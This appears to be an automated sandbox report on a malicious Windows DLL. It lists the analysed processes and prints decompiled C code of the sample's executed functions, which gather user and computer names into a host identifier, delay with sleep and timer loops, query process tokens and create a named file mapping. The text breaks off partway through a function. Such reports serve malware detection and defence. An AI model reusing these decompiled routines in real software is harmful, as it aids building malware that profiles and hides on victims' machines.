Commandline:rundll32.exe 'C:\Users\user\Desktop\lj3H69Z3Io.dll',#1
Imagebase:0x1c0000
File size:61952 bytes
MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high

Chronological Activities

Analysis Process: rundll32.exe PID: 644 Parent PID: 2392

General

Start time:11:35:56
Start date:12/07/2021
Path:C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):true
Commandline:rundll32.exe C:\Users\user\Desktop\lj3H69Z3Io.dll,Dealthis
Imagebase:0x1c0000
File size:61952 bytes
MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language

Chronological Activities

Analysis Process: rundll32.exe PID: 1312 Parent PID: 2392

General

Start time:11:36:03
Start date:12/07/2021
Path:C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):true
Commandline:rundll32.exe C:\Users\user\Desktop\lj3H69Z3Io.dll,Sing
Imagebase:0x1c0000
File size:61952 bytes
MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language

Chronological Activities

Analysis Process: rundll32.exe PID: 2924 Parent PID: 2392

General

Start time:11:36:10
Start date:12/07/2021
Path:C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):true
Commandline:rundll32.exe C:\Users\user\Desktop\lj3H69Z3Io.dll,Teethshould
Imagebase:0x1c0000
File size:61952 bytes
MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language

Chronological Activities

Analysis Process: WerFault.exe PID: 3860 Parent PID: 644

General

Start time:11:37:21
Start date:12/07/2021
Path:C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):true
Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 644 -s 652
Imagebase:0x190000
File size:434592 bytes
MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language

Chronological Activities

Analysis Process: WerFault.exe PID: 5776 Parent PID: 644

General

Start time:11:37:21
Start date:12/07/2021
Path:C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):true
Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 644 -s 644
Imagebase:0x190000
File size:434592 bytes
MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language

Chronological Activities

Analysis Process: WerFault.exe PID: 4840 Parent PID: 2924

General

Start time:11:37:21
Start date:12/07/2021
Path:C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):true
Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 2924 -s 652
Imagebase:0x190000
File size:434592 bytes
MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language

Chronological Activities

Analysis Process: WerFault.exe PID: 2948 Parent PID: 2924

General

Start time:11:37:39
Start date:12/07/2021
Path:C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):true
Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 2924 -s 660
Imagebase:0x190000
File size:434592 bytes
MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language

Chronological Activities

Disassembly

Code Analysis

Reset < >

    Analysis Process: rundll32.exe PID: 6072 Parent PID: 2392 rundll32.exeCOMMON

    Executed Functions

    Function 03094454, Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 102memoryCOMMON
    Download Yara Rule
    C-Code - Quality: 96%
    			E03094454(char __eax, signed int* __esi) {
				long _v8;
				char _v12;
				signed int _v16;
				signed int _v20;
				signed int _v28;
				long _t34;
				signed int _t39;
				long _t50;
				char _t59;
				intOrPtr _t61;
				void* _t62;
				void* _t63;
				signed int* _t64;
				char _t65;
				intOrPtr* _t67;
				void* _t68;
				signed int* _t69;

				_t69 = __esi;
				_t65 = __eax;
				_v8 = 0;
				_v12 = __eax;
				if(__eax == 0) {
					_t59 =  *0x309a2c8; // 0xbd092303
					_v12 = _t59;
				}
				_t64 = _t69;
				E0309143F( &_v12, _t64);
				if(_t65 != 0) {
					 *_t69 =  *_t69 ^  *0x309a2d0 ^ 0x4c0ca0ae;
				} else {
					GetUserNameW(0,  &_v8); // executed
					_t50 = _v8;
					if(_t50 != 0) {
						_t62 = RtlAllocateHeap( *0x309a290, 0, _t50 + _t50);
						if(_t62 != 0) {
							if(GetUserNameW(_t62,  &_v8) != 0) {
								_t63 = _t62;
								 *_t69 =  *_t69 ^ E0309283A(_v8 + _v8, _t63);
							}
							HeapFree( *0x309a290, 0, _t62);
						}
					}
				}
				_t61 = __imp__;
				_v8 = _v8 & 0x00000000;
				GetComputerNameW(0,  &_v8);
				_t34 = _v8;
				if(_t34 != 0) {
					_t68 = RtlAllocateHeap( *0x309a290, 0, _t34 + _t34);
					if(_t68 != 0) {
						if(GetComputerNameW(_t68,  &_v8) != 0) {
							_t63 = _t68;
							_t69[3] = _t69[3] ^ E0309283A(_v8 + _v8, _t63);
						}
						HeapFree( *0x309a290, 0, _t68);
					}
				}
				asm("cpuid");
				_t67 =  &_v28;
				 *_t67 = 1;
				 *((intOrPtr*)(_t67 + 4)) = _t61;
				 *(_t67 + 8) = _t63;
				 *(_t67 + 0xc) = _t64;
				_t39 = _v16 ^ _v20 ^ _v28;
				_t69[1] = _t69[1] ^ _t39;
				return _t39;
			}




















    0x03094454
    0x0309445c
    0x03094462
    0x03094465
    0x03094468
    0x0309446a
    0x0309446f
    0x0309446f
    0x03094475
    0x03094477
    0x03094484
    0x030944e5
    0x03094486
    0x0309448b
    0x03094491
    0x03094496
    0x030944a4
    0x030944a8
    0x030944b7
    0x030944be
    0x030944c5
    0x030944c5
    0x030944d0
    0x030944d0
    0x030944a8
    0x03094496
    0x030944e7
    0x030944ed
    0x030944f7
    0x030944f9
    0x030944fe
    0x0309450d
    0x03094511
    0x0309451c
    0x03094523
    0x0309452a
    0x0309452a
    0x03094536
    0x03094536
    0x03094511
    0x0309453f
    0x03094541
    0x03094544
    0x03094546
    0x03094549
    0x0309454c
    0x03094556
    0x0309455a
    0x0309455e

    APIs
    • GetUserNameW.ADVAPI32(00000000,030955CE), ref: 0309448B
    • RtlAllocateHeap.NTDLL(00000000,030955CE), ref: 030944A2
    • GetUserNameW.ADVAPI32(00000000,030955CE), ref: 030944AF
    • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,030955CE,?,?,?,?,?,03096BD8,?,00000001), ref: 030944D0
    • GetComputerNameW.KERNEL32(00000000,00000000), ref: 030944F7
    • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 0309450B
    • GetComputerNameW.KERNEL32(00000000,00000000), ref: 03094518
    • HeapFree.KERNEL32(00000000,00000000), ref: 03094536
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.523760339.0000000003091000.00000020.00000001.sdmp, Offset: 03090000, based on PE: true
    • Associated: 00000002.00000002.523754782.0000000003090000.00000004.00000001.sdmp Download File
    • Associated: 00000002.00000002.523768513.0000000003099000.00000002.00000001.sdmp Download File
    • Associated: 00000002.00000002.523773657.000000000309A000.00000004.00000001.sdmp Download File
    • Associated: 00000002.00000002.523778925.000000000309C000.00000002.00000001.sdmp Download File
    Similarity
    • API ID: HeapName$AllocateComputerFreeUser
    • String ID: Uxt
    • API String ID: 3239747167-1536154274
    • Opcode ID: 1f8c61854634c775ec5a8c232fa1f0d8fcf9696e7b0fd9e54e9f45d40f63ea6b
    • Instruction ID: 9e02a57df07b31f32bf1845e2619613326c3c8e561a2557157f70d62fdb9cf6c
    • Opcode Fuzzy Hash: 1f8c61854634c775ec5a8c232fa1f0d8fcf9696e7b0fd9e54e9f45d40f63ea6b
    • Instruction Fuzzy Hash: 4C316D71A02209EFEB11EFA9DD80AAEF7F9FF88300F15446AE505D7210DB35DA11AB10
    Uniqueness

    Uniqueness Score: -1.00%

    Function 03096B0F, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72sleepmemorytimeCOMMON
    Download Yara Rule
    C-Code - Quality: 73%
    			E03096B0F(void* __edx, intOrPtr _a4) {
				struct _FILETIME _v12;
				char _v32;
				long _v40;
				void* _t14;
				void* _t16;
				int _t18;
				signed int _t20;
				void* _t22;
				signed int _t23;
				intOrPtr _t25;
				unsigned int _t29;
				void* _t33;
				signed int _t40;

				_t33 = __edx;
				_t14 = HeapCreate(0, 0x400000, 0); // executed
				 *0x309a290 = _t14;
				if(_t14 != 0) {
					 *0x309a180 = GetTickCount();
					_t16 = E03094C1B(_a4);
					if(_t16 != 0) {
						L10:
						return _t16;
					} else {
						goto L3;
					}
					do {
						L3:
						GetSystemTimeAsFileTime( &_v12);
						_t18 = SwitchToThread();
						_t29 = _v12.dwHighDateTime;
						_t20 = (_t29 << 0x00000020 | _v12.dwLowDateTime) >> 7;
						_push(0);
						_push(9);
						_push(_t29 >> 7);
						_push(_t20);
						L03097EEA();
						_t40 = _t18 + _t20;
						_t22 = E0309414A(_a4, _t40);
						_t23 = 2;
						Sleep(_t23 << _t40); // executed
					} while (_t22 == 1);
					_t25 =  *0x309a2ac; // 0x334
					_v32 = 0;
					if(_t25 != 0) {
						__imp__(_t25,  &_v32);
						if(_t25 == 0) {
							_v40 = 0;
						}
						if(_v40 != 0) {
							 *0x309a2b8 = 1; // executed
						}
					}
					_t16 = E030953F2(_t33); // executed
					goto L10;
				}
				_t16 = 8;
				goto L10;
			}
















    0x03096b0f
    0x03096b24
    0x03096b2c
    0x03096b31
    0x03096b44
    0x03096b49
    0x03096b50
    0x03096bd8
    0x03096bde
    0x00000000
    0x00000000
    0x00000000
    0x03096b56
    0x03096b56
    0x03096b5b
    0x03096b61
    0x03096b67
    0x03096b71
    0x03096b75
    0x03096b76
    0x03096b7b
    0x03096b7c
    0x03096b7d
    0x03096b82
    0x03096b88
    0x03096b91
    0x03096b97
    0x03096b9d
    0x03096ba2
    0x03096ba9
    0x03096bad
    0x03096bb5
    0x03096bbd
    0x03096bbf
    0x03096bbf
    0x03096bc7
    0x03096bc9
    0x03096bc9
    0x03096bc7
    0x03096bd3
    0x00000000
    0x03096bd3
    0x03096b35
    0x00000000

    APIs
    • HeapCreate.KERNELBASE(00000000,00400000,00000000,?,00000001), ref: 03096B24
    • GetTickCount.KERNEL32 ref: 03096B3B
    • GetSystemTimeAsFileTime.KERNEL32(?,?,?,00000001), ref: 03096B5B
    • SwitchToThread.KERNEL32(?,00000001), ref: 03096B61
    • _aullrem.NTDLL(?,?,00000009,00000000), ref: 03096B7D
    • Sleep.KERNELBASE(00000002,00000000,?,00000001), ref: 03096B97
    • IsWow64Process.KERNEL32(00000334,?,?,00000001), ref: 03096BB5
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.523760339.0000000003091000.00000020.00000001.sdmp, Offset: 03090000, based on PE: true
    • Associated: 00000002.00000002.523754782.0000000003090000.00000004.00000001.sdmp Download File
    • Associated: 00000002.00000002.523768513.0000000003099000.00000002.00000001.sdmp Download File
    • Associated: 00000002.00000002.523773657.000000000309A000.00000004.00000001.sdmp Download File
    • Associated: 00000002.00000002.523778925.000000000309C000.00000002.00000001.sdmp Download File
    Similarity
    • API ID: Time$CountCreateFileHeapProcessSleepSwitchSystemThreadTickWow64_aullrem
    • String ID: 1B
    • API String ID: 3690864001-3133059986
    • Opcode ID: fe3c5b55cbe3061b45163993f790cb70b6bba9a69ffde573d6edda7a463c32f0
    • Instruction ID: c13a65db236e4290289c29858162d4820bed6c895403873ead09c185ee2e4e2a
    • Opcode Fuzzy Hash: fe3c5b55cbe3061b45163993f790cb70b6bba9a69ffde573d6edda7a463c32f0
    • Instruction Fuzzy Hash: BC21EBB1A06318AFEB10EF69DC99A5A77DCF784360F00492FF555C6180E77AC8449B61
    Uniqueness

    Uniqueness Score: -1.00%

    Function 03092D06, Relevance: 10.6, APIs: 7, Instructions: 81nativeCOMMON
    Download Yara Rule
    C-Code - Quality: 38%
    			E03092D06(char _a4, void* _a8) {
				void* _v8;
				void* _v12;
				char _v16;
				void* _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				void* _v44;
				void** _t33;
				void* _t40;
				void* _t43;
				void** _t44;
				intOrPtr* _t47;
				char _t48;

				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v20 = _a4;
				_t48 = 0;
				_v16 = 0;
				_a4 = 0;
				_v44 = 0x18;
				_v40 = 0;
				_v32 = 0;
				_v36 = 0;
				_v28 = 0;
				_v24 = 0;
				if(NtOpenProcess( &_v12, 0x400,  &_v44,  &_v20) >= 0) {
					_t33 =  &_v8;
					__imp__(_v12, 8, _t33);
					if(_t33 >= 0) {
						_t47 = __imp__;
						 *_t47(_v8, 1, 0, 0,  &_a4, _t43); // executed
						_t44 = E03096837(_a4);
						if(_t44 != 0) {
							_t40 =  *_t47(_v8, 1, _t44, _a4,  &_a4); // executed
							if(_t40 >= 0) {
								memcpy(_a8,  *_t44, 0x1c);
								_t48 = 1;
							}
							E030950CA(_t44);
						}
						NtClose(_v8); // executed
					}
					NtClose(_v12);
				}
				return _t48;
			}



















    0x03092d13
    0x03092d14
    0x03092d15
    0x03092d16
    0x03092d17
    0x03092d1b
    0x03092d22
    0x03092d31
    0x03092d34
    0x03092d37
    0x03092d3e
    0x03092d41
    0x03092d44
    0x03092d47
    0x03092d4a
    0x03092d55
    0x03092d57
    0x03092d60
    0x03092d68
    0x03092d6a
    0x03092d7c
    0x03092d86
    0x03092d8a
    0x03092d99
    0x03092d9d
    0x03092da6
    0x03092dae
    0x03092dae
    0x03092db0
    0x03092db0
    0x03092db8
    0x03092dbe
    0x03092dc2
    0x03092dc2
    0x03092dcd

    APIs
    • NtOpenProcess.NTDLL(00000000,00000400,?,?), ref: 03092D4D
    • NtOpenProcessToken.NTDLL(00000000,00000008,00000000), ref: 03092D60
    • NtQueryInformationToken.NTDLL(00000000,00000001,00000000,00000000,00000000), ref: 03092D7C
      • Part of subcall function 03096837: RtlAllocateHeap.NTDLL(00000000,00000000,03094197), ref: 03096843
    • NtQueryInformationToken.NTDLL(00000000,00000001,00000000,00000000,00000000), ref: 03092D99
    • memcpy.NTDLL(00000000,00000000,0000001C), ref: 03092DA6
    • NtClose.NTDLL(00000000), ref: 03092DB8
    • NtClose.NTDLL(00000000), ref: 03092DC2
    Memory Dump Source
    • Source File: 00000002.00000002.523760339.0000000003091000.00000020.00000001.sdmp, Offset: 03090000, based on PE: true
    • Associated: 00000002.00000002.523754782.0000000003090000.00000004.00000001.sdmp Download File
    • Associated: 00000002.00000002.523768513.0000000003099000.00000002.00000001.sdmp Download File
    • Associated: 00000002.00000002.523773657.000000000309A000.00000004.00000001.sdmp Download File
    • Associated: 00000002.00000002.523778925.000000000309C000.00000002.00000001.sdmp Download File
    Similarity
    • API ID: Token$CloseInformationOpenProcessQuery$AllocateHeapmemcpy
    • String ID:
    • API String ID: 2575439697-0
    • Opcode ID: 52693f66eb323bc2f95730dbade7a8381094236569df7bf6447b0f5d472883af
    • Instruction ID: 7434fddb25db17c73b504530d098c7f372e838b2b22ad7b303141e41a7c619ee
    • Opcode Fuzzy Hash: 52693f66eb323bc2f95730dbade7a8381094236569df7bf6447b0f5d472883af
    • Instruction Fuzzy Hash: 3C21F0B690222CBBEF01EF95CC45ADEBBBDFB48750F104066F904AA154D7768A409BA0
    Uniqueness

    Uniqueness Score: -1.00%

    Function 03092022, Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 149timememoryCOMMON
    Download Yara Rule
    C-Code - Quality: 83%
    			E03092022(intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				struct %anon52 _v8;
				long _v12;
				char _v16;
				char _v20;
				signed int _v24;
				intOrPtr _v32;
				union _LARGE_INTEGER _v36;
				intOrPtr _v40;
				void* _v44;
				void _v88;
				char _v92;
				struct %anon52 _t46;
				intOrPtr _t51;
				long _t53;
				void* _t54;
				struct %anon52 _t61;
				long _t65;
				signed int _t66;
				void* _t69;
				void* _t71;
				signed int _t72;
				intOrPtr _t74;
				intOrPtr _t76;
				void** _t78;
				void* _t80;

				_t74 = __edx;
				_v92 = 0;
				memset( &_v88, 0, 0x2c);
				_t46 = CreateWaitableTimerA(0, 1, 0);
				_v44 = _t46;
				if(_t46 == 0) {
					_v8.LowPart = GetLastError();
				} else {
					_push(0xffffffff);
					_push(0xff676980);
					_push(0);
					_push( *0x309a298);
					_v20 = 0;
					_v16 = 0;
					L03097D8C();
					_v36.LowPart = _t46;
					_v32 = _t74;
					SetWaitableTimer(_v44,  &_v36, 0, 0, 0, 0);
					_t51 =  *0x309a2c4; // 0x330
					_v40 = _t51;
					_t53 = WaitForMultipleObjects(2,  &_v44, 0, 0xffffffff);
					_v8.LowPart = _t53;
					if(_t53 == 0) {
						if(_a8 != 0) {
							L4:
							 *0x309a2a4 = 5;
						} else {
							_t69 = E03091AB8(_t74); // executed
							if(_t69 != 0) {
								goto L4;
							}
						}
						_v12 = 0;
						L6:
						L6:
						if(_v12 == 1 && ( *0x309a2b8 & 0x00000001) == 0) {
							_v12 = 2;
						}
						_t72 = _v12;
						_t58 = _t72 << 4;
						_t76 = _t80 + (_t72 << 4) - 0x54;
						_t73 = _t72 + 1;
						_v24 = _t72 + 1;
						_t61 = E03095F9A( &_v20, _t73, _t76, _t73, _t80 + _t58 - 0x58, _t76,  &_v16);
						_v8.LowPart = _t61;
						if(_t61 != 0) {
							goto L17;
						}
						_t66 = _v24;
						_t90 = _t66 - 3;
						_v12 = _t66;
						if(_t66 != 3) {
							goto L6;
						} else {
							_v8.LowPart = E03093032(_t73, _t90,  &_v92, _a4, _a8);
						}
						goto L12;
						L17:
						__eflags = _t61 - 0x10d2;
						if(_t61 != 0x10d2) {
							_push(0xffffffff);
							_push(0xff676980);
							_push(0);
							_push( *0x309a29c);
							goto L21;
						} else {
							__eflags =  *0x309a2a0; // 0xa
							if(__eflags == 0) {
								goto L12;
							} else {
								_t61 = E03091492();
								_push(0xffffffff);
								_push(0xdc3cba00);
								_push(0);
								_push( *0x309a2a0);
								L21:
								L03097D8C();
								_v36.LowPart = _t61;
								_v32 = _t76;
								SetWaitableTimer(_v44,  &_v36, 0, 0, 0, 0);
								_t65 = WaitForMultipleObjects(2,  &_v44, 0, 0xffffffff);
								__eflags = _t65;
								_v8.LowPart = _t65;
								if(_t65 == 0) {
									goto L6;
								} else {
									goto L12;
								}
							}
						}
						L25:
					}
					L12:
					_t78 =  &_v92;
					_t71 = 3;
					do {
						_t54 =  *_t78;
						if(_t54 != 0) {
							HeapFree( *0x309a290, 0, _t54);
						}
						_t78 =  &(_t78[4]);
						_t71 = _t71 - 1;
					} while (_t71 != 0);
					CloseHandle(_v44);
				}
				return _v8;
				goto L25;
			}




























    0x03092022
    0x03092034
    0x03092037
    0x03092043
    0x0309204b
    0x0309204e
    0x030921b4
    0x03092054
    0x03092054
    0x03092056
    0x0309205b
    0x0309205c
    0x03092062
    0x03092065
    0x03092068
    0x03092076
    0x03092081
    0x03092084
    0x03092086
    0x03092093
    0x0309209d
    0x030920a1
    0x030920a4
    0x030920a9
    0x030920b4
    0x030920b4
    0x030920ab
    0x030920ab
    0x030920b2
    0x00000000
    0x00000000
    0x030920b2
    0x030920be
    0x00000000
    0x030920c1
    0x030920c5
    0x030920d0
    0x030920d0
    0x030920d7
    0x030920dc
    0x030920e3
    0x030920ec
    0x030920f2
    0x030920f5
    0x030920fc
    0x030920ff
    0x00000000
    0x00000000
    0x03092101
    0x03092104
    0x03092107
    0x0309210a
    0x00000000
    0x0309210c
    0x0309211b
    0x0309211b
    0x00000000
    0x03092149
    0x03092149
    0x0309214e
    0x0309216d
    0x0309216f
    0x03092174
    0x03092175
    0x00000000
    0x03092150
    0x03092150
    0x03092156
    0x00000000
    0x03092158
    0x03092158
    0x0309215d
    0x0309215f
    0x03092164
    0x03092165
    0x0309217b
    0x0309217b
    0x03092183
    0x0309218e
    0x03092191
    0x0309219c
    0x0309219e
    0x030921a0
    0x030921a3
    0x00000000
    0x030921a9
    0x00000000
    0x030921a9
    0x030921a3
    0x03092156
    0x00000000
    0x0309214e
    0x0309211e
    0x03092120
    0x03092123
    0x03092124
    0x03092124
    0x03092128
    0x03092132
    0x03092132
    0x03092138
    0x0309213b
    0x0309213b
    0x03092141
    0x03092141
    0x030921be
    0x00000000

    APIs
    • memset.NTDLL ref: 03092037
    • CreateWaitableTimerA.KERNEL32(00000000,00000001,00000000), ref: 03092043
    • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 03092068
    • SetWaitableTimer.KERNELBASE(?,?,00000000,00000000,00000000,00000000), ref: 03092084
    • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 0309209D
    • HeapFree.KERNEL32(00000000,00000000), ref: 03092132
    • CloseHandle.KERNEL32(?), ref: 03092141
    • _allmul.NTDLL(00000000,FF676980,000000FF,00000002), ref: 0309217B
    • SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF,00000002,?,?,0309560C), ref: 03092191
    • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 0309219C
      • Part of subcall function 03091AB8: HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,06D69340,?,00000000,30314549,00000014,004F0053,06D692FC), ref: 03091BA4
      • Part of subcall function 03091AB8: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,030920B0), ref: 03091BB6
    • GetLastError.KERNEL32 ref: 030921AE
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.523760339.0000000003091000.00000020.00000001.sdmp, Offset: 03090000, based on PE: true
    • Associated: 00000002.00000002.523754782.0000000003090000.00000004.00000001.sdmp Download File
    • Associated: 00000002.00000002.523768513.0000000003099000.00000002.00000001.sdmp Download File
    • Associated: 00000002.00000002.523773657.000000000309A000.00000004.00000001.sdmp Download File
    • Associated: 00000002.00000002.523778925.000000000309C000.00000002.00000001.sdmp Download File
    Similarity
    • API ID: FreeHeapTimerWaitable$MultipleObjectsWait_allmul$CloseCreateErrorHandleLastmemset
    • String ID: Uxt
    • API String ID: 3521023985-1536154274
    • Opcode ID: 23cfa8fde745c92bbf1a25dd6c8b258503b6b65566ca10fd02aa557601ff8561
    • Instruction ID: 3c543e14e7d17e6d3681e383f1b0134ceb494452feb12d8bd4c8b8e09797989e
    • Opcode Fuzzy Hash: 23cfa8fde745c92bbf1a25dd6c8b258503b6b65566ca10fd02aa557601ff8561
    • Instruction Fuzzy Hash: CA516671902228BEEF10EF98DC449EEBBBCFF89320F244617E514E6184D7758A50DBA0
    Uniqueness

    Uniqueness Score: -1.00%

    Function 03096384, Relevance: 13.6, APIs: 9, Instructions: 72filetimeCOMMON
    Download Yara Rule
    C-Code - Quality: 74%
    			E03096384(intOrPtr __edx, void** _a4, void** _a8) {
				intOrPtr _v8;
				struct _FILETIME* _v12;
				short _v56;
				struct _FILETIME* _t12;
				intOrPtr _t13;
				void* _t17;
				void* _t21;
				intOrPtr _t27;
				long _t28;
				void* _t30;

				_t27 = __edx;
				_t12 =  &_v12;
				GetSystemTimeAsFileTime(_t12);
				_push(0x192);
				_push(0x54d38000);
				_push(_v8);
				_push(_v12);
				L03097D86();
				_push(_t12);
				_v12 = _t12;
				_t13 =  *0x309a2d4; // 0x3ccd5a8
				_t5 = _t13 + 0x309b8a2; // 0x6d68e4a
				_t6 = _t13 + 0x309b57c; // 0x530025
				_push(0x16);
				_push( &_v56);
				_v8 = _t27;
				L03097A6A();
				_t17 = CreateFileMappingW(0xffffffff, 0x309a2f8, 4, 0, 0x1000,  &_v56); // executed
				_t30 = _t17;
				if(_t30 == 0) {
					_t28 = GetLastError();
				} else {
					if(GetLastError() == 0xb7) {
						_t21 = MapViewOfFile(_t30, 6, 0, 0, 0); // executed
						if(_t21 == 0) {
							_t28 = GetLastError();
							if(_t28 != 0) {
								goto L6;
							}
						} else {
							 *_a4 = _t30;
							 *_a8 = _t21;
							_t28 = 0;
						}
					} else {
						_t28 = 2;
						L6:
						CloseHandle(_t30);
					}
				}
				return _t28;
			}













    0x03096384
    0x0309638c
    0x03096390
    0x03096396
    0x0309639b
    0x030963a0
    0x030963a3
    0x030963a6
    0x030963ab
    0x030963ac
    0x030963af
    0x030963b4
    0x030963bb
    0x030963c5
    0x030963c7
    0x030963c8
    0x030963cb
    0x030963e7
    0x030963ed
    0x030963f1
    0x0309643f
    0x030963f3
    0x03096400
    0x03096410
    0x03096418
    0x0309642a
    0x0309642e
    0x00000000
    0x00000000
    0x0309641a
    0x0309641d
    0x03096422
    0x03096424
    0x03096424
    0x03096402
    0x03096404
    0x03096430
    0x03096431
    0x03096431
    0x03096400
    0x03096446

    APIs
    • GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,03095488,?,00000001,?), ref: 03096390
    • _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 030963A6
    • _snwprintf.NTDLL ref: 030963CB
    • CreateFileMappingW.KERNELBASE(000000FF,0309A2F8,00000004,00000000,00001000,?), ref: 030963E7
    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,03095488,?), ref: 030963F9
    • MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000), ref: 03096410
    • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,03095488), ref: 03096431
    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,03095488,?), ref: 03096439
    Memory Dump Source
    • Source File: 00000002.00000002.523760339.0000000003091000.00000020.00000001.sdmp, Offset: 03090000, based on PE: true
    • Associated: 00000002.00000002.523754782.0000000003090000.00000004.00000001.sdmp Download File
    • Associated: 00000002.00000002.523768513.0000000003099000.00000002.00000001.sdmp Download File
    • Associated: 00000002.00000002.523773657.000000000309A000.00000004.00000001.sdmp Download File
    • Associated: 00000002.00000002.523778925.000000000309C000.00000002.00000001.sdmp Download File
    Similarity
    • API ID: File$ErrorLastTime$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
    • String ID:
    • API String ID: 1814172918-0
    • Opcode ID: 3d7bfc99b99ee8fb2eaaab7b9da4cceb620755c40f8b6d07d6c2ae2c7a6e6bb2
    • Instruction ID: dc8134faf803d218a2176039f1e1440f7e16e2234b28426311fd379782cc8d92
    • Opcode Fuzzy Hash: 3d7bfc99b99ee8fb2eaaab7b9da4cceb620755c40f8b6d07d6c2ae2c7a6e6bb2
    • Instruction Fuzzy Hash: E4210572602218FFEB10EBA8DC06FDD77B8AB84760F254127F915EB280DB7295019B60
    Uniqueness

    Uniqueness Score: -1.00%

    Function 030953F2, Relevance: 10.7, APIs: 7, Instructions: 191memoryCOMMON
    Download Yara Rule
    C-Code - Quality: 64%
    			E030953F2(signed int __edx) {
				signed int _v8;
				long _v12;
				signed int _v16;
				long _v20;
				void* _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				char _v40;
				void* __edi;
				void* __esi;
				void* _t27;
				long _t28;
				long _t31;
				intOrPtr _t32;
				void* _t36;
				signed int _t37;
				intOrPtr _t38;
				void* _t39;
				CHAR* _t42;
				long _t48;
				long _t49;
				void* _t54;
				void* _t56;
				intOrPtr _t64;
				void* _t67;
				long _t71;
				void* _t72;
				signed char _t74;
				intOrPtr _t76;
				signed int _t77;
				long _t82;
				long _t84;
				CHAR* _t87;
				void* _t88;

				_t79 = __edx;
				_v16 = 0;
				_v8 = 0;
				_v12 = 0;
				_t27 = E030958F8();
				if(_t27 != 0) {
					_t77 =  *0x309a2b4; // 0x4000000a
					_t73 = (_t77 & 0xf0000000) + _t27;
					 *0x309a2b4 = (_t77 & 0xf0000000) + _t27;
				}
				_t28 =  *0x309a148(0, 2);
				_v20 = _t28;
				if(_t28 == 0 || _t28 == 1 || _t28 == 0x80010106) {
					_t31 = E0309696F( &_v8,  &_v16); // executed
					_push(0);
					_t84 = _t31;
					_t32 =  *0x309a2d4; // 0x3ccd5a8
					_push(0x309a2fc);
					_push(1);
					_t7 = _t32 + 0x309b5ad; // 0x4d283a53
					 *0x309a2f8 = 0xc;
					 *0x309a300 = 0;
					L03094AF8();
					_t36 = E03096384(_t79,  &_v24,  &_v12); // executed
					if(_t36 == 0) {
						CloseHandle(_v24);
					}
					if(_t84 != 5) {
						_t37 = _v16;
						__eflags = _t37;
						if(_t37 != 0) {
							E03094454(_t37 ^ 0xe8fa7dd7,  &_v40);
							_t87 = E03096837(0x27);
							__eflags = _t87;
							if(_t87 != 0) {
								asm("bswap eax");
								asm("bswap eax");
								asm("bswap eax");
								asm("bswap eax");
								_t64 =  *0x309a2d4; // 0x3ccd5a8
								_t18 = _t64 + 0x309b84f; // 0x78383025
								wsprintfA(_t87, _t18, _v40, _v36, _v32, _v28);
								_t88 = _t88 + 0x18;
							}
							 *0x309a32c = _t87;
						}
						_t38 = E030960E1();
						 *0x309a2c8 =  *0x309a2c8 ^ 0xe8fa7dd7;
						 *0x309a31c = _t38;
						_t39 = E03096837(0x60);
						__eflags = _t39;
						 *0x309a37c = _t39;
						if(_t39 == 0) {
							_t84 = 8;
						} else {
							memset(_t39, 0, 0x60);
							_t54 =  *0x309a37c; // 0x6d69630
							_t88 = _t88 + 0xc;
							__imp__(_t54 + 0x40);
							_t56 =  *0x309a37c; // 0x6d69630
							 *_t56 = 0x309b83e;
							_t84 = 0;
						}
						__eflags = _t84;
